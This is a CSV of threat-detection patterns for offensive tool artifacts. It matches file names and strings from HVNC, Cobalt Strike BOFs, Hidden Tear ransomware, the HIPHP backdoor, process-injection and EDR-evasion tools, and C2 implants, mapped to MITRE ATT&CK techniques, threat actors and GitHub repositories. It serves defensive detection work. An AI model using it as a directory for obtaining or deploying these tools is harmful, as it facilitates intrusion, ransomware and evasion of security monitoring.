"*HiddenDesktop.x64.bin*",".{0,1000}HiddenDesktop\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47158"
"*HiddenDesktop.x86.bin*",".{0,1000}HiddenDesktop\.x86\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47159"
"*HiddenDesktop.zip*",".{0,1000}HiddenDesktop\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47160"
"*HiddenDesktop_ControlWindow*",".{0,1000}HiddenDesktop_ControlWindow.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47161"
"*hiddenFunctions\upload_file.py*",".{0,1000}hiddenFunctions\\upload_file\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47162"
"*hidden-tear-1-master.zip*",".{0,1000}hidden\-tear\-1\-master\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47164"
"*hidden-tear-decrypter.csproj*",".{0,1000}hidden\-tear\-decrypter\.csproj.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47165"
"*hidden-tear-decrypter.exe*",".{0,1000}hidden\-tear\-decrypter\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47166"
"*hidden-tear-decrypter.pdb*",".{0,1000}hidden\-tear\-decrypter\.pdb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47167"
"*hidden-tear-master.zip*",".{0,1000}hidden\-tear\-master\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47168"
"*hidden-tear-remake.zip*",".{0,1000}hidden\-tear\-remake\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47169"
"*HiddenUser.ps1*",".{0,1000}HiddenUser\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47170"
"*hide-implant*",".{0,1000}hide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","47171"
"*Hijack Remote Desktop session #4 with knowledge of the logged-on user*",".{0,1000}Hijack\sRemote\sDesktop\ssession\s\#4\swith\sknowledge\sof\sthe\slogged\-on\suser.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","47173"
"*HIJACK_DLL_PATH*",".{0,1000}HIJACK_DLL_PATH.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","47174"
"*hijack_hunter *",".{0,1000}hijack_hunter\s.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","47175"
"*hijack_remote_thread*",".{0,1000}hijack_remote_thread.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","47176"
"*hijackablepath.c*",".{0,1000}hijackablepath\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","47177"
"*hijackablepath.o*",".{0,1000}hijackablepath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","47178"
"*hijackCLSIDpersistence.*",".{0,1000}hijackCLSIDpersistence\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","47179"
"*hijackDll*WINMM.dll*",".{0,1000}hijackDll.{0,1000}WINMM\.dll.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47180"
"*Hijacked timer queue handle from the target process: *",".{0,1000}Hijacked\stimer\squeue\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","47181"
"*Hijacked worker factory handle from the target process: *",".{0,1000}Hijacked\sworker\sfactory\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","47182"
"*HijackHunter.csproj*",".{0,1000}HijackHunter\.csproj.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47183"
"*HijackHunter.exe*",".{0,1000}HijackHunter\.exe.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47184"
"*Hijack-MultipleKeys -dll *",".{0,1000}Hijack\-MultipleKeys\s\-dll\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","47185"
"*hijackProgDirMissingDll*",".{0,1000}hijackProgDirMissingDll.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47186"
"*HijackShellLib.dll*",".{0,1000}HijackShellLib\.dll.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","47187"
"*HInvokeHashGen.cs*",".{0,1000}HInvokeHashGen\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","47189"
"*hiphp *--url*",".{0,1000}hiphp\s.{0,1000}\-\-url.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47190"
"*hiphp.hiphplinkextractor*",".{0,1000}hiphp\.hiphplinkextractor.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47191"
"*hiphp.hiphpversion*",".{0,1000}hiphp\.hiphpversion.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47192"
"*hiphp-0.3.4.deb*",".{0,1000}hiphp\-0\.3\.4\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47193"
"*hiphp-0.3.5.deb*",".{0,1000}hiphp\-0\.3\.5\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47194"
"*hiphp-0.3.6.deb*",".{0,1000}hiphp\-0\.3\.6\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47195"
"*hiphp-1.*.*.deb*",".{0,1000}hiphp\-1\..{0,1000}\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47196"
"*hiphp-cli.bat*",".{0,1000}hiphp\-cli\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47197"
"*hiphp-desktop.bat*",".{0,1000}hiphp\-desktop\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47198"
"*hiphp-termux.sh*",".{0,1000}hiphp\-termux\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47199"
"*hiphp-tk.bat*",".{0,1000}hiphp\-tk\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47200"
"*history_cmd",".{0,1000}history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47206"
"*Hit enter to run shellcode/payload without creating a new thread*",".{0,1000}Hit\senter\sto\srun\sshellcode\/payload\swithout\screating\sa\snew\sthread.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","47208"
"*Hit Slack API rate limit !!!*",".{0,1000}Hit\sSlack\sAPI\srate\slimit\s!!!.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","47209"
"*hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion*",".{0,1000}hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47210"
